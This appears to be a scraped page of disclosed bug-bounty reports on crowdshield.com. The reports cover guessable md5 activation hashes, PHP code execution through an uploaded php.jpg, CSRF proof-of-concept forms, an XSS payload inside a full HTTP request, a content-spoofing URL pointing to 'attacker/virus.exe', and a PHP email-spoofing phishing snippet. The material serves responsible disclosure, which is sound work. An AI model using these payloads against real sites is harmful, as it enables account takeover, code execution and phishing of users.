Reporting

Authentication Bypass

Severity: High
Bug ID: 703
Researcher: dia2diab
Status: Disclosed
Submitted: 07/01/2015

Description:

Authentication Bypass Activation Code step

Affected URL:

https://crowdshield.com/account.php?hash=

Affected Params:

hash

Bug Evidence:

When i went to register on your web site, i found you sent me activation url on my email with a simple hash:

1- https://crowdshield.com/account.php?hash=c7e1249ffc03eb9ded908c236bd1996d
2- https://crowdshield.com/account.php?hash=55a7cf9c71f1c9c495413f934dd1a158
3- https://crowdshield.com/account.php?hash=24b16fede9a67c9251d3e7c7161c83ac

as you can see the three activation url for three email addresses, but the problem is the hash value is md5 for a random numbers

c7e1249ffc03eb9ded908c236bd1996d => md5(87)
55a7cf9c71f1c9c495413f934dd1a158 => md5(492)
24b16fede9a67c9251d3e7c7161c83ac => md5(372)

This lead attacker to register with any email on the internet that does't belongs to him and can active the account on crowdshield.com by easy way.

Simple python script that request md5 values as 
https://crowdshield.com/account.php?hash=[PayLoad_here] 


Bug Recommendation:

I recommend to make this hash more complicated

Privilege Escalation

Severity: High
Bug ID: 703
Researcher: poseidon
Status: Disclosed
Submitted: 08/24/2018

Description:

https://www.paypal.com/cgi-bin/webscr?cmd=_xclick&business=WNFU87G7CPVAU&lc=US&item_name=Sn1per%20Professional&item_number=0001&amount=20%2e00&currency_code=USD&button_subtype=services&tax_rate=0%2e000&shipping=0%2e00&bn=PP%2dBuyNowBF%3abtn_buynowCC_LG%2egif%3aNonHosted the amount can be altered and it is not reexamined later

Affected URL:

https://xerosecurity.com/ordering.html

Affected Params:

the link to paypal

Bug Evidence:

already provided to the head


Bug Recommendation:

Revalidate the payments amount before sending license

Privilege Escalation

Severity: High
Bug ID: 703
Researcher: daksh
Status: Disclosed
Submitted: 12/05/2014

Description:

As I reported earlier about Privilege Escalation on comment section where I was able to comment on behalf of bounty admin, You fixed it. But i think it is not fixed entirely.

Affected URL:

https://crowdshield.com/dashboard.php?bug_id=[ID]

Affected Params:

sent_from

Bug Evidence:

bug_id=538&researcher_username=daksh&bug_category=Cross+Site+Request+Forgery&bounty_name=CrowdShield&sent_from=researcher&bug_comment=test&bug_reply=Reply

All you need to do is change the sent_from=bounty and the comment ll be done on behalf of bounty admin.


Bug Recommendation:

I think you should remove that parameter.

Privilege Escalation

Severity: High
Bug ID: 703
Researcher: realn0j
Status: Disclosed
Submitted: 09/06/2017

Description:

Loading the blog page with an invalid post name results in a comment box being displayed to all users above the list of posts. Authenticated users may submit comments to this which are stored and displayed in the list of blog posts. All invalid 'name' parameter submissions appear to affect a single comment thread which is displayed on any page with an invalid name given.

Affected URL:

https://crowdshield.com/blog.php?name=

Affected Params:

name

Bug Evidence:

Evidence and steps to reproduce provided to @1N3 via Slack.


Bug Recommendation:

Check for valid ?name parameter before displaying the comment box or accepting comment submissions. As a sanity check, check database regularly for orphaned comments.

Screenshot:



Remote Code Execution

Severity: High
Bug ID: 703
Researcher: zoczus
Status: Disclosed
Submitted: 05/06/2015

Description:

Remote Code Execution in file uploads

Affected URL:

https://crowdshield.com

Affected Params:

M/A

Bug Evidence:

Hi,

I've just found RCE bug in your server. 

https://crowdshield.com/uploads/rce.php.jpg - this one executes normally, as php. :-) 

Code:
<?php
system("uname -a");
phpinfo();
?>



Bug Recommendation:

Not sure how your /etc/mime.types looks like but if there's no jpg extension Apache can probably behave just like this. Waiting for some feedback and bounty. :) Have a nice day! Jakub Zoczek

Buffer Overflow

Severity: Medium
Bug ID: 703
Researcher: rockcena
Status: Disclosed
Submitted: 12/01/2014

Description:

hello team i found Broken Authentication that leads to character limits bypass

Affected URL:

http://crowdshield.com/

Affected Params:

ISC2

Bug Evidence:

for example 

i found ISC2 character limits bypass

character limit is 60 so now i bypass to 100 character 

1234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890

now i put 100 character

https://www.youtube.com/watch?v=vMJRBUmHBmQ

note :

its unlisted video
 
now more than 100 char there  but limit 60 :p

fix it soon 

Regards,
sarath


Bug Recommendation:

validate server side properly

Cross Site Request Forgery

Severity: Medium
Bug ID: 703
Researcher: sandeepv
Status: Disclosed
Submitted: 11/30/2014

Description:

Forging login requests: Attacker can monitor victim's actions An attacker may forge a request to log the victim into a target website using the attacker's credentials; this is known as login CSRF. Login CSRF makes various novel attacks possible; for instance, an attacker can later log into the site with his legitimate credentials and view private information like activity history that has been saved in the account.

Affected URL:

http://crowdshield.com/login.php

Affected Params:

username , password

Bug Evidence:

<html>
<body>
  <form action="http://crowdshield.com/login.php" method="POST">
      <input type="hidden" name="username" value="user" />
      <input type="hidden" name="password" value="pass123" />
      <input type="hidden" name="submit" value="Login" />
      <input type="submit" value="Submit request" />
      </form>
</body>
</html>


Bug Recommendation:

Implement csrf tokens in both cookies and post request.This restricts some token bypasses

Cross Site Request Forgery

Severity: Medium
Bug ID: 703
Researcher: sandeepv
Status: Disclosed
Submitted: 11/30/2014

Description:

The csrf protection is not implemented in reporting new bug.So the attacker can take advantage to send a csrf link to victim to post a bug to victim. here the attacker can write any abuse about the program to reduce the tester reputation.

Affected URL:

http://crowdshield.com/report_bug_new.php

Affected Params:

Bug submission

Bug Evidence:

<html>
  <body>
    <form action="http://crowdshield.com/report_bug_new.php" method="POST">
      <input type="hidden" name="affected_url" value="sdf" />
      <input type="hidden" name="affected_params" value="dsf" />
      <input type="hidden" name="bug_description" value="dsfdsfffffffffffffffffffffffffffffffffffffffffffffdvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv                             sdggggggggggggggg" />
      <input type="hidden" name="bug_evidence" value="dsf        wertwetrwt" />
      <input type="hidden" name="bug_recommendation" value="dsf      ewrtretret" />
      <input type="hidden" name="bug_category" value="Cross&#32;Site&#32;Scripting" />
      <input type="hidden" name="submit_bug" value="Submit&#32;Bug" />
      <input type="hidden" name="bounty_id" value="12" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Bug Recommendation:

Implement csrf tokens in both cookies and post request.This restricts some token bypasses

Reflected Cross Site Scripting

Severity: Medium
Bug ID: 703
Researcher: pratap
Status: Disclosed
Submitted: 12/16/2014

Description:

An XSS Vulnerability exists in the account page. Steps to Reproduce: 1. Click on create a researcher account. 2. Select username as <script>alert(1);</script> 3. Click on create account. When the successful creation page is displayed, click on browser back button, 4. Reload the page and XSS is triggered.

Affected URL:

http://crowdshield.com/account.php

Affected Params:

researcher_username

Bug Evidence:

POST /account.php HTTP/1.1
Host: crowdshield.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://crowdshield.com/account.php
Cookie: __cfduid=d022fe4a4b859e83f2a384005c5dceb521418758454; PHPSESSID=8jet0csoiucsoiucj7qkfk7uv6; __utma=242435792.217988264.1418758459.1418758459.1418758459.1; __utmb=242435792.48.10.1418758459; __utmc=242435792; __utmz=242435792.1418758459.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _ga=GA1.2.217988264.1418758459; __utmt=1; _gat=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315

researcher_email=pratap.14692%40gmail.com&researcher_username=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password1=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_password2=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&researcher_terms=accept&submit=Create+Account&create_account=researcher&captcha=36




Bug Recommendation:

Sanitize evil input.

Application Errors

Severity: Low
Bug ID: 703
Researcher: guifre
Status: Disclosed
Submitted: 07/29/2017

Description:

Content spoofing & text injection on crowdshield.com Content Spoofing is an attack technique that allows an attacker to inject a malicious payload that is later misrepresented as legitimate content of a web application. This approach is common on error pages, or sites providing story or news entries. The content specified in this parameter is later reflected into the page to provide the content for the page. If an attacker where to replace this content with something more sinister they might be able to falsify statements on the destination website. Upon visiting this link the user would believe the content being displayed as legitimate.

Affected URL:

http://crowdshield.com/%20needs%20a%20new%20web%20client%2c%20please%20download%20http%3a%2f%2fattacker%2fvirus.exe%20to%20we%20able%20to%20open%20it.%20Your%20browser%20compatible%20plugin

Affected Params:

n/a

Bug Evidence:

Hi,

I get in touch to report that crowdshield.com is vulnerable to content spoofing and text injection.


This attack exploits the trust relationship established between the user and the web site.


PoC
http://crowdshield.com/%20needs%20a%20new%20web%20client%2c%20please%20download%20http%3a%2f%2fattacker%2fvirus.exe%20to%20we%20able%20to%20open%20it.%20Your%20browser%20compatible%20plugin

The URL path is URL decoded and attacker text is reflected back to the UI:

"The requested URL / needs a new web client, please download http://attacker/virus.exe to we able to open it.”

Please, let me know if you need further information

Best Regards,
Guifre.


Bug Recommendation:

Use a 404 page that don't include attacker text.

Session Security and Cookies

Severity: Low
Bug ID: 703
Researcher: testingcs
Status: Disclosed
Submitted: 04/24/2016

Description:

SESSION TAKEOVER bug in CROWDSHIELD. In this bug even after changing the password, user's session DOES NOT EXPIRE on other devices.

Affected URL:

https://crowdshield.com

Affected Params:



Bug Evidence:

Steps to Reproduce the BUG:

1) I have logged into two different browser with same password (the password is qwertyuiop2)
2) Now I am changing the password in one of the browser (new password is qwertyuiop3)
3) NOW EVEN AFTER CHANGING THE PASSWORD MY SESSION IN ANOTHER BROWSER IS STILL ALIVE.

DANGER associated with this bug is that an ATTACKER can hijack the session and account of the VICTIM


Bug Recommendation:

MUST EXPIRE THE SESSION AS SOON AS THE USER LOG OUT.

Video:



Other

Severity: Informational
Bug ID: 703
Researcher: zediwon
Status: Disclosed
Submitted: 09/28/2015

Description:

Hi, it is possible to know bugs reported by other researchers title, affected parameter and url in simple a simple bug.

Affected URL:

https://crowdshield.com/report_bug.php

Affected Params:

all

Bug Evidence:

Scenario:

    Researcher uses a shared computer.
    Researcher submits a report.
    Researcher logs out.
    Another person logs in, on another account.
    Another person submits a report.
    When entering a title, the title of the previous report submitted by the researcher is shown in autocompletion box.

This gives away the title, report url & affected parameter of the bug to other users of the web browser, even though the researcher logged out properly.


Bug Recommendation:

Simple, put autocomplete="off" for <input type parameters.

Other

Severity: Informational
Bug ID: 703
Researcher: behroz
Status: Disclosed
Submitted: 10/06/2015

Description:

I checked SPF records for the www.crowdshield.com where in the DNS Resource Records, Mx Record crowdshield.com can be spoofed easily or even SMTP relay can result in sending un-authorized emails from crowdshield.com mail domain.

Affected URL:

https://crowdshield.com

Affected Params:



Bug Evidence:

POC

An SMTP Relay can easily send an unauthorized email from "anything" @crowdshield.com domain for example [email protected] stating that Due to security reasons please Re-enter your password // or may say that you have been rewarded from crowdshield.com and to get reward please click below. A normal user will believe it as it is from the crowdshield.com mail server therefore, user would blindly believe and will fall for this trick.

After User click the link there are many devastating possibilies which can be achieve by the attacker who would spoof as crowdshield.com authentic person.

For example PHP language can be used to send email from crowdshield.com domain. SMTP relay is possible

<?php
$to = "[email protected]";
$subject = "Change your Password ";
$txt = "Change your password by visiting here - [VIRUS LINK HERE]l";
$headers = "From: [email protected]";
mail($to,$subject,$txt,$headers);
?>


Bug Recommendation:

when user clicks at the link, user would be redirected to the attackers website which may result in stealing crowdshield.com account session ID hence a session would be hijacked and attacker would easily get access to victims account there fore he could read public + private information for that particular account. As the problem was in your mail exchange server. It would impact in your "Reputed Loss" as customers would lost faith in you hence reducing your productivity. Infact if the attacker is even evil then user might get infected in a bad way. After clicking on attackers link , a trojan would get installed in Victims system which would create a back door for attacker to Remotely access his system and there are other devastating possibilities as well. If you need a checksum for this vulnerability you could use one of the email spoofing tools that are available online. I tried to send from [email protected] to my email address to verify, I recieved Email address from [email protected] your spf records for crowdshield.com: v=spf1 include:spf.mandrillapp.com ?all it should be : v=spf1 include:spf.mandrillapp.com -all in your SPF record you should replace ? with - at last before all , - is strict which prevents all spoofed emails except if you are sending. Your bug is that you are using ? , you should use -

Screenshot:



Pending Bugs

ID Severity Vulnerability User Date Status
692High Authentication Bypass dia2diab 07/01/2015 Disclosed
778High Privilege Escalation poseidon 08/24/2018 Disclosed
641High Privilege Escalation daksh 12/05/2014 Disclosed
744High Privilege Escalation realn0j 09/06/2017 Disclosed
670High Remote Code Execution zoczus 05/06/2015 Disclosed
593Medium Buffer Overflow rockcena 12/01/2014 Disclosed
578Medium Cross Site Request Forgery sandeepv 11/30/2014 Disclosed
580Medium Cross Site Request Forgery sandeepv 11/30/2014 Disclosed
659Medium Reflected Cross Site Scripting pratap 12/16/2014 Disclosed
742Low Application Errors guifre 07/29/2017 Disclosed
724Low Session Security and Cookies testingcs 04/24/2016 Disclosed
706Informational Other zediwon 09/28/2015 Disclosed
707Informational Other behroz 10/06/2015 Disclosed